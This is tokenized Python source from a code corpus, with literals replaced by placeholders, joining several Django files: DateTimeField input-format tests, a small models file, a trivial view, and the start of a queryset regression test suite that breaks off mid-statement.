DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class CustomDateTimeInputFormatsTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_DATETIME_INPUT_FORMATS = settings . DATETIME_INPUT_FORMATS <EOL> settings . DATETIME_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def tearDown ( self ) : <EOL> settings . DATETIME_INPUT_FORMATS = self . old_DATETIME_INPUT_FORMATS <EOL> def test_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . 
DateTimeField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . 
assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class SimpleDateTimeFormatTests ( TestCase ) : <EOL> def test_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . 
assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) </s>
<s> from django . db import models <EOL> class People ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> class Message ( models . Model ) : <EOL> from_field = models . ForeignKey ( People , db_column = '<STR_LIT>' ) </s>
<s> from django import http <EOL> def index ( request ) : <EOL> return http . HttpResponse ( '<STR_LIT>' ) </s>
<s> import datetime <EOL> import pickle <EOL> import sys <EOL> import unittest <EOL> from django . conf import settings <EOL> from django . core . exceptions import FieldError <EOL> from django . db import DatabaseError , connection , connections , DEFAULT_DB_ALIAS <EOL> from django . db . models import Count <EOL> from django . db . models . query import Q , ITER_CHUNK_SIZE , EmptyQuerySet <EOL> from django . test import TestCase <EOL> from django . utils . datastructures import SortedDict <EOL> from models import ( Annotation , Article , Author , Celebrity , Child , Cover , Detail , <EOL> DumbCategory , ExtraInfo , Fan , Item , LeafA , LoopX , LoopZ , ManagedModel , <EOL> Member , NamedCategory , Note , Number , Plaything , PointerA , Ranking , Related , <EOL> Report , ReservedName , Tag , TvChef , Valid , X , Food , Eaten , Node ) <EOL> class BaseQuerysetTest ( TestCase ) : <EOL> def assertValueQuerysetEqual ( self , qs , values ) : <EOL> return self . assertQuerysetEqual ( qs , values , transform = lambda x : x ) <EOL> def assertRaisesMessage ( self , exc , msg , func , * args , ** kwargs ) : <EOL> try : <EOL> func ( * args , ** kwargs ) <EOL> except Exception , e : <EOL> self . assertEqual ( msg , str ( e ) ) <EOL> self . assertTrue ( isinstance ( e , exc ) , "<STR_LIT>" % ( exc , type ( e ) ) ) <EOL> else : <EOL> if hasattr ( exc , '<STR_LIT>' ) : <EOL> excName = exc . __name__ <EOL> else : <EOL> excName = str ( exc ) <EOL> raise AssertionError , "<STR_LIT>" % excName <EOL> class Queries1Tests ( BaseQuerysetTest ) : <EOL> def setUp ( self ) : <EOL> generic = NamedCategory . objects . create ( name = "<STR_LIT>" ) <EOL> self . t1 = Tag . objects . create ( name = '<STR_LIT>' , category = generic ) <EOL> self . t2 = Tag . objects . create ( name = '<STR_LIT>' , parent = self . t1 , category = generic ) <EOL> self . t3 = Tag . objects . create ( name = '<STR_LIT>' , parent = self . t1 ) <EOL> t4 = Tag . objects . create ( name = '<STR_LIT>' , parent = self . 
t3 ) <EOL> self . t5 = Tag . objects . create ( name = '<STR_LIT>' , parent = self . t3 ) <EOL> self . n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> n2 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:bar>' , id = <NUM_LIT:2> ) <EOL> self . n3 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:3> ) <EOL> ann1 = Annotation . objects . create ( name = '<STR_LIT>' , tag = self . t1 ) <EOL> ann1 . notes . add ( self . n1 ) <EOL> ann2 = Annotation . objects . create ( name = '<STR_LIT>' , tag = t4 ) <EOL> ann2 . notes . add ( n2 , self . n3 ) <EOL> self . e2 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = n2 ) <EOL> e1 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = self . n1 ) <EOL> self . a1 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> self . a2 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> a3 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = self . e2 ) <EOL> self . a4 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = self . e2 ) <EOL> self . time1 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> self . time2 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> time3 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> time4 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . i1 = Item . objects . create ( name = '<STR_LIT>' , created = self . time1 , modified = self . time1 , creator = self . a1 , note = self . n3 ) <EOL> self . i1 . tags = [ self . t1 , self . t2 ] <EOL> self . i2 = Item . objects . create ( name = '<STR_LIT>' , created = self . 
time2 , creator = self . a2 , note = n2 ) <EOL> self . i2 . tags = [ self . t1 , self . t3 ] <EOL> self . i3 = Item . objects . create ( name = '<STR_LIT>' , created = time3 , creator = self . a2 , note = self . n3 ) <EOL> i4 = Item . objects . create ( name = '<STR_LIT>' , created = time4 , creator = self . a4 , note = self . n3 ) <EOL> i4 . tags = [ t4 ] <EOL> self . r1 = Report . objects . create ( name = '<STR_LIT>' , creator = self . a1 ) <EOL> Report . objects . create ( name = '<STR_LIT>' , creator = a3 ) <EOL> Report . objects . create ( name = '<STR_LIT>' ) <EOL> self . rank1 = Ranking . objects . create ( rank = <NUM_LIT:2> , author = self . a2 ) <EOL> Cover . objects . create ( title = "<STR_LIT>" , item = i4 ) <EOL> Cover . objects . create ( title = "<STR_LIT>" , item = self . i2 ) <EOL> def test_ticket1050 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__isnull = True ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__id__isnull = True ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket1801 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( item = self . i2 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( item = self . i3 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( item = self . i2 ) & Author . objects . filter ( item = self . i3 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket2306 ( self ) : <EOL> query = Item . objects . filter ( tags = self . t2 ) . query <EOL> self . assertTrue ( query . LOUTER not in [ x [ <NUM_LIT:2> ] for x in query . alias_map . values ( ) ] ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( tags = self . t1 ) ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . 
filter ( Q ( tags = self . t1 ) ) . filter ( Q ( tags = self . t2 ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( tags = self . t1 ) ) . filter ( Q ( creator__name = '<STR_LIT>' ) | Q ( tags = self . t2 ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( tags = self . t1 ) & Q ( tags = self . t2 ) ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( tags = self . t1 ) , Q ( creator__name = '<STR_LIT>' ) | Q ( tags = self . t2 ) ) , <EOL> [ ] <EOL> ) <EOL> qs = Author . objects . filter ( ranking__rank = <NUM_LIT:2> , ranking__id = self . rank1 . id ) <EOL> self . assertQuerysetEqual ( list ( qs ) , [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , qs . query . count_active_tables ( ) , <NUM_LIT:2> ) <EOL> qs = Author . objects . filter ( ranking__rank = <NUM_LIT:2> ) . filter ( ranking__id = self . rank1 . id ) <EOL> self . assertEqual ( qs . query . count_active_tables ( ) , <NUM_LIT:3> ) <EOL> def test_ticket4464 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags = self . t1 ) . filter ( tags = self . t2 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__in = [ self . t1 , self . t2 ] ) . distinct ( ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__in = [ self . t1 , self . t2 ] ) . filter ( tags = self . t3 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__in = [ self . t1 , self . t2 ] ) . order_by ( '<STR_LIT:name>' ) [ : <NUM_LIT:3> ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__in = [ self . t1 , self . t2 ] ) . distinct ( ) . 
order_by ( '<STR_LIT:name>' ) [ : <NUM_LIT:3> ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_2080_3592 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( item__name = '<STR_LIT>' ) | Author . objects . filter ( name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( item__name = '<STR_LIT>' ) | Q ( name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( name = '<STR_LIT>' ) | Q ( item__name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( item__name = '<STR_LIT>' ) | Q ( report__name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket6074 ( self ) : <EOL> self . assertQuerysetEqual ( Author . objects . filter ( Q ( id__in = [ ] ) ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( id__in = [ ] ) | Q ( id__in = [ ] ) ) , <EOL> [ ] <EOL> ) <EOL> def test_tickets_1878_2939 ( self ) : <EOL> self . assertEqual ( Item . objects . values ( '<STR_LIT>' ) . distinct ( ) . count ( ) , <NUM_LIT:3> ) <EOL> xx = Item ( name = '<STR_LIT>' , created = self . time1 , creator = self . a2 , note = self . n1 ) <EOL> xx . save ( ) <EOL> self . assertEqual ( <EOL> Item . objects . exclude ( name = '<STR_LIT>' ) . values ( '<STR_LIT>' , '<STR_LIT:name>' ) . distinct ( ) . count ( ) , <EOL> <NUM_LIT:4> <EOL> ) <EOL> self . assertEqual ( <EOL> Item . objects . exclude ( name = '<STR_LIT>' ) . extra ( select = { '<STR_LIT:foo>' : '<STR_LIT:%s>' } , select_params = ( <NUM_LIT:1> , ) ) . values ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT:foo>' ) . distinct ( ) . count ( ) , <EOL> <NUM_LIT:4> <EOL> ) <EOL> self . assertEqual ( <EOL> Item . objects . exclude ( name = '<STR_LIT>' ) . 
extra ( select = { '<STR_LIT:foo>' : '<STR_LIT:%s>' } , select_params = ( <NUM_LIT:1> , ) ) . values ( '<STR_LIT>' , '<STR_LIT:name>' ) . distinct ( ) . count ( ) , <EOL> <NUM_LIT:4> <EOL> ) <EOL> xx . delete ( ) <EOL> def test_ticket7323 ( self ) : <EOL> self . assertEqual ( Item . objects . values ( '<STR_LIT>' , '<STR_LIT:name>' ) . count ( ) , <NUM_LIT:4> ) <EOL> def test_ticket2253 ( self ) : <EOL> q1 = Item . objects . order_by ( '<STR_LIT:name>' ) <EOL> q2 = Item . objects . filter ( id = self . i1 . id ) <EOL> self . assertQuerysetEqual ( <EOL> q1 , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( q2 , [ '<STR_LIT>' ] ) <EOL> self . assertQuerysetEqual ( <EOL> ( q1 | q2 ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( ( q1 & q2 ) . order_by ( '<STR_LIT:name>' ) , [ '<STR_LIT>' ] ) <EOL> q1 = Item . objects . filter ( tags = self . t1 ) <EOL> q2 = Item . objects . filter ( note = self . n3 , tags = self . t2 ) <EOL> q3 = Item . objects . filter ( creator = self . a4 ) <EOL> self . assertQuerysetEqual ( <EOL> ( ( q1 & q2 ) | q3 ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_4088_4306 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Report . objects . filter ( creator = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Report . objects . filter ( creator__num = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( Report . objects . filter ( creator__id = <NUM_LIT> ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> Report . objects . filter ( creator__id = self . a1 . id ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Report . objects . filter ( creator__name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket4510 ( self ) : <EOL> self . 
assertQuerysetEqual ( <EOL> Author . objects . filter ( report__name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7378 ( self ) : <EOL> self . assertQuerysetEqual ( self . a1 . report_set . all ( ) , [ '<STR_LIT>' ] ) <EOL> def test_tickets_5324_6704 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( tags__name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) . distinct ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( tags__name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) . distinct ( ) . reverse ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . exclude ( item__name = '<STR_LIT>' ) . distinct ( ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( tags__name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( tags__name = '<STR_LIT>' ) . exclude ( tags__name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> query = Item . objects . exclude ( creator__in = [ self . a1 , self . a2 ] ) . query <EOL> self . assertTrue ( query . LOUTER not in [ x [ <NUM_LIT:2> ] for x in query . alias_map . values ( ) ] ) <EOL> qs = Author . objects . filter ( id = self . a1 . id ) . filter ( Q ( extra__note = self . n1 ) | Q ( item__note = self . n3 ) ) <EOL> self . assertEqual ( <EOL> len ( [ x [ <NUM_LIT:2> ] for x in qs . query . alias_map . values ( ) if x [ <NUM_LIT:2> ] == query . LOUTER and qs . query . alias_refcount [ x [ <NUM_LIT:1> ] ] ] ) , <EOL> <NUM_LIT:1> <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . 
filter ( parent__isnull = True ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( parent__isnull = True ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( Q ( parent__name = '<STR_LIT>' ) | Q ( parent__isnull = True ) ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( Q ( parent__isnull = True ) | Q ( parent__name = '<STR_LIT>' ) ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( Q ( parent__parent__isnull = True ) ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( ~ Q ( parent__parent__isnull = True ) ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket2091 ( self ) : <EOL> t = Tag . objects . get ( name = '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__in = [ t ] ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_heterogeneous_qs_combination ( self ) : <EOL> self . assertRaisesMessage ( <EOL> AssertionError , <EOL> '<STR_LIT>' , <EOL> lambda : Author . objects . all ( ) & Tag . objects . all ( ) <EOL> ) <EOL> self . assertRaisesMessage ( <EOL> AssertionError , <EOL> '<STR_LIT>' , <EOL> lambda : Author . objects . all ( ) | Tag . objects . all ( ) <EOL> ) <EOL> def test_ticket3141 ( self ) : <EOL> self . assertEqual ( Author . objects . extra ( select = { '<STR_LIT:foo>' : '<STR_LIT:1>' } ) . count ( ) , <NUM_LIT:4> ) <EOL> self . assertEqual ( <EOL> Author . objects . extra ( select = { '<STR_LIT:foo>' : '<STR_LIT:%s>' } , select_params = ( <NUM_LIT:1> , ) ) . 
count ( ) , <EOL> <NUM_LIT:4> <EOL> ) <EOL> def test_ticket2400 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( item__isnull = True ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( item__isnull = True ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket2496 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . extra ( tables = [ '<STR_LIT>' ] ) . select_related ( ) . order_by ( '<STR_LIT:name>' ) [ : <NUM_LIT:1> ] , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_2076_7256 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . order_by ( '<STR_LIT>' , '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . order_by ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Cover . objects . all ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . order_by ( '<STR_LIT>' , '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__isnull = False ) . order_by ( '<STR_LIT>' , '<STR_LIT:id>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> qs = Item . objects . order_by ( '<STR_LIT:name>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertEqual ( len ( qs . query . tables ) , <NUM_LIT:1> ) <EOL> def test_tickets_2874_3002 ( self ) : <EOL> qs = Item . objects . select_related ( ) . order_by ( '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . 
